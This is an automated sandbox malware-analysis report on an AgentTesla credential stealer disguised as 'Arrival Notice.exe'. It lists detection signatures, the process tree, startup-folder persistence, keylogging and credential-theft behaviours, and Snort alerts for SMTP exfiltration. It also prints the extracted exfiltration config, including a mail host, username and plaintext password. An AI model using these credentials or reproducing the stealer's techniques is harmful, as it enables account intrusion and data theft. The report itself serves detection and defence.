Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Arrival Notice.exe

Overview

General Information

Sample name:Arrival Notice.exe
Analysis ID:1467213
MD5:954f20c5963fc61a5848f7bf9fef6ba4
SHA1:fc49c57595e06950054af47ac676c122b18dba41
SHA256:7d32ffb777ed327a39961748d04917f29b52bf373e7cb07a64cc86ebc172352b
Tags:AgentTeslaexe
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Snort IDS alert for network traffic
Yara detected AgentTesla
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Contains functionality to log keystrokes (.Net Source)
Drops VBS files to the startup folder
Initial sample is a PE file and has a suspicious name
Installs a global keyboard hook
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: WScript or CScript Dropper
Switches to a custom stack to bypass stack traces
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • Arrival Notice.exe (PID: 6116 cmdline: "C:\Users\user\Desktop\Arrival Notice.exe" MD5: 954F20C5963FC61A5848F7BF9FEF6BA4)
    • name.exe (PID: 2748 cmdline: "C:\Users\user\Desktop\Arrival Notice.exe" MD5: 954F20C5963FC61A5848F7BF9FEF6BA4)
      • RegSvcs.exe (PID: 5144 cmdline: "C:\Users\user\Desktop\Arrival Notice.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • wscript.exe (PID: 4396 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • name.exe (PID: 5052 cmdline: "C:\Users\user\AppData\Local\directory\name.exe" MD5: 954F20C5963FC61A5848F7BF9FEF6BA4)
      • RegSvcs.exe (PID: 3632 cmdline: "C:\Users\user\AppData\Local\directory\name.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
{"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.mahesh-ent.com", "Username": "info@mahesh-ent.com", "Password": "M@hesh3981"}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    SourceRuleDescriptionAuthorStrings
    00000003.00000002.2226892130.0000000002EA4000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000003.00000002.2226892130.0000000002E9C000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000002.00000002.2086913169.00000000015D0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000002.00000002.2086913169.00000000015D0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            00000002.00000002.2086913169.00000000015D0000.00000004.00001000.00020000.00000000.sdmpINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
            • 0x33e6d:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
            • 0x33edf:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
            • 0x33f69:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
            • 0x33ffb:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
            • 0x34065:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
            • 0x340d7:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
            • 0x3416d:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
            • 0x341fd:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
            Click to see the 17 entries
            SourceRuleDescriptionAuthorStrings
            3.2.RegSvcs.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              3.2.RegSvcs.exe.400000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                3.2.RegSvcs.exe.400000.0.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
                • 0x33e6d:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                • 0x33edf:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                • 0x33f69:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                • 0x33ffb:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                • 0x34065:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                • 0x340d7:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                • 0x3416d:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                • 0x341fd:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                5.2.name.exe.3950000.1.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                  5.2.name.exe.3950000.1.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                    Click to see the 10 entries

                    System Summary

                    barindex
                    Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs" , ProcessId: 4396, ProcessName: wscript.exe
                    Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 148.66.136.151, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Initiated: true, ProcessId: 5144, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49700
                    Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs" , ProcessId: 4396, ProcessName: wscript.exe

                    Data Obfuscation

                    barindex
                    Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\directory\name.exe, ProcessId: 2748, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs
                    Timestamp:07/03/24-21:20:37.832940
                    SID:2030171
                    Source Port:49726
                    Destination Port:587
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:07/03/24-21:18:53.976045
                    SID:2030171
                    Source Port:49711
                    Destination Port:587
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:07/03/24-21:19:36.768009
                    SID:2840032
                    Source Port:49716
                    Destination Port:587
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:07/03/24-21:19:53.289503
                    SID:2030171
                    Source Port:49719
                    Destination Port:587
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:07/03/24-21:19:19.246288
                    SID:2030171
                    Source Port:49713
                    Destination Port:587
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:07/03/24-21:17:01.207853
                    SID:2030171
                    Source Port:49700
                    Destination Port:587
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:07/03/24-21:20:05.972440
                    SID:2840032
                    Source Port:49722
                    Destination Port:587
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:07/03/24-21:20:24.508698
                    SID:2030171
                    Source Port:49725
                    Destination Port:587
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:07/03/24-21:19:33.245041
                    SID:2840032
                    Source Port:49715
                    Destination Port:587
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:07/03/24-21:17:15.105650
                    SID:2030171
                    Source Port:49702
                    Destination Port:587
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:07/03/24-21:19:36.767963
                    SID:2030171
                    Source Port:49716
                    Destination Port:587
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:07/03/24-21:18:53.976163
                    SID:2840032
                    Source Port:49711
                    Destination Port:587
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:07/03/24-21:19:53.289584
                    SID:2840032
                    Source Port:49719
                    Destination Port:587
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:07/03/24-21:20:37.833155
                    SID:2840032
                    Source Port:49726
                    Destination Port:587
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:07/03/24-21:19:19.246440
                    SID:2840032
                    Source Port:49713
                    Destination Port:587
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:07/03/24-21:19:33.244969
                    SID:2030171
                    Source Port:49715
                    Destination Port:587
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:07/03/24-21:20:05.972198
                    SID:2030171
                    Source Port:49722
                    Destination Port:587
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:07/03/24-21:20:24.508803
                    SID:2840032
                    Source Port:49725
                    Destination Port:587
                    Protocol:TCP
                    Classtype:A Network Trojan was detected

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Source: 3.2.RegSvcs.exe.400000.0.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.mahesh-ent.com", "Username": "info@mahesh-ent.com", "Password": "M@hesh3981"}
                    Source: C:\Users\user\AppData\Local\directory\name.exeReversingLabs: Detection: 63%
                    Source: Arrival Notice.exeReversingLabs: Detection: 63%
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Source: C:\Users\user\AppData\Local\directory\name.exeJoe Sandbox ML: detected
                    Source: Arrival Notice.exeJoe Sandbox ML: detected
                    Source: Arrival Notice.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                    Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.6:49699 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.6:49701 version: TLS 1.2
                    Source: Binary string: wntdll.pdbUGP source: name.exe, 00000002.00000003.2083901923.0000000003EB0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000002.00000003.2085516595.00000000040A0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000005.00000003.2222185062.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000005.00000003.2222613590.0000000004000000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: wntdll.pdb source: name.exe, 00000002.00000003.2083901923.0000000003EB0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000002.00000003.2085516595.00000000040A0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000005.00000003.2222185062.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000005.00000003.2222613590.0000000004000000.00000004.00001000.00020000.00000000.sdmp
                    Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_00934696 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00934696
                    Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_0093C9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0093C9C7
                    Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_0093C93C FindFirstFileW,FindClose,0_2_0093C93C
                    Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_0093F200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0093F200
                    Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_0093F35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0093F35D
                    Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_0093F65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0093F65E
                    Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_00933A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00933A2B
                    Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_00933D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00933D4E
                    Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_0093BF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0093BF27
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_00214696 GetFileAttributesW,FindFirstFileW,FindClose,2_2_00214696
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_0021C93C FindFirstFileW,FindClose,2_2_0021C93C
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_0021C9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,2_2_0021C9C7
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_0021F200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_0021F200
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_0021F35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_0021F35D
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_0021F65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_0021F65E
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_00213A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,2_2_00213A2B
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_00213D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,2_2_00213D4E
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_0021BF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_0021BF27
                    Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
                    Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Jump to behavior
                    Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Jump to behavior
                    Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Jump to behavior
                    Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
                    Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Jump to behavior

                    Networking

                    barindex
                    Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.6:49700 -> 148.66.136.151:587
                    Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.6:49702 -> 148.66.136.151:587
                    Source: TrafficSnort IDS: 2840032 ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 192.168.2.6:49711 -> 148.66.136.151:587
                    Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.6:49711 -> 148.66.136.151:587
                    Source: TrafficSnort IDS: 2840032 ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 192.168.2.6:49713 -> 148.66.136.151:587
                    Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.6:49713 -> 148.66.136.151:587
                    Source: TrafficSnort IDS: 2840032 ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 192.168.2.6:49715 -> 148.66.136.151:587
                    Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.6:49715 -> 148.66.136.151:587
                    Source: TrafficSnort IDS: 2840032 ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 192.168.2.6:49716 -> 148.66.136.151:587
                    Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.6:49716 -> 148.66.136.151:587
                    Source: TrafficSnort IDS: 2840032 ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 192.168.2.6:49719 -> 148.66.136.151:587
                    Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.6:49719 -> 148.66.136.151:587
                    Source: TrafficSnort IDS: 2840032 ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 192.168.2.6:49722 -> 148.66.136.151:587
                    Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.6:49722 -> 148.66.136.151:587
                    Source: TrafficSnort IDS: 2840032 ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 192.168.2.6:49725 -> 148.66.136.151:587
                    Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.6:49725 -> 148.66.136.151:587
                    Source: TrafficSnort IDS: 2840032 ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 192.168.2.6:49726 -> 148.66.136.151:587
                    Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.6:49726 -> 148.66.136.151:587
                    Source: global trafficTCP traffic: 192.168.2.6:49700 -> 148.66.136.151:587
                    Source: Joe Sandbox ViewIP Address: 148.66.136.151 148.66.136.151
                    Source: Joe Sandbox ViewIP Address: 104.26.12.205 104.26.12.205
                    Source: Joe Sandbox ViewIP Address: 104.26.12.205 104.26.12.205
                    Source: Joe Sandbox ViewASN Name: AS-26496-GO-DADDY-COM-LLCUS AS-26496-GO-DADDY-COM-LLCUS
                    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                    Source: unknownDNS query: name: api.ipify.org
                    Source: unknownDNS query: name: api.ipify.org
                    Source: unknownDNS query: name: api.ipify.org
                    Source: global trafficTCP traffic: 192.168.2.6:49700 -> 148.66.136.151:587
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_009425E2 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_009425E2
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: global trafficDNS traffic detected: DNS query: api.ipify.org
                    Source: global trafficDNS traffic detected: DNS query: mail.mahesh-ent.com
                    Source: RegSvcs.exe, 00000003.00000002.2226892130.0000000002E9C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4531977929.0000000002C5E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4531977929.0000000002BFC000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4531977929.0000000002A92000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4531977929.0000000002A11000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4531977929.0000000002D42000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4531977929.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4531977929.0000000002B29000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4531977929.0000000002DC1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4531977929.0000000002E54000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.mahesh-ent.com
                    Source: RegSvcs.exe, 00000003.00000002.2226892130.0000000002E21000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4531977929.000000000295C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: RegSvcs.exe, 00000006.00000002.4537874564.0000000005CF2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.c
                    Source: name.exe, 00000002.00000002.2086913169.00000000015D0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2224272082.0000000000402000.00000040.80000000.00040000.00000000.sdmp, name.exe, 00000005.00000002.2225248989.0000000003950000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                    Source: name.exe, 00000002.00000002.2086913169.00000000015D0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2226892130.0000000002E21000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2224272082.0000000000402000.00000040.80000000.00040000.00000000.sdmp, name.exe, 00000005.00000002.2225248989.0000000003950000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4531977929.000000000295C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
                    Source: RegSvcs.exe, 00000003.00000002.2226892130.0000000002E21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
                    Source: RegSvcs.exe, 00000003.00000002.2226892130.0000000002E21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/t
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
                    Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.6:49699 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.6:49701 version: TLS 1.2

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    barindex
                    Source: 2.2.name.exe.15d0000.1.raw.unpack, 3DlgK9re6m.cs.Net Code: S8rY0
                    Source: 5.2.name.exe.3950000.1.raw.unpack, 3DlgK9re6m.cs.Net Code: S8rY0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeJump to behavior
                    Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_0094425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_0094425A
                    Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_00944458 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00944458
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_00224458 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,2_2_00224458
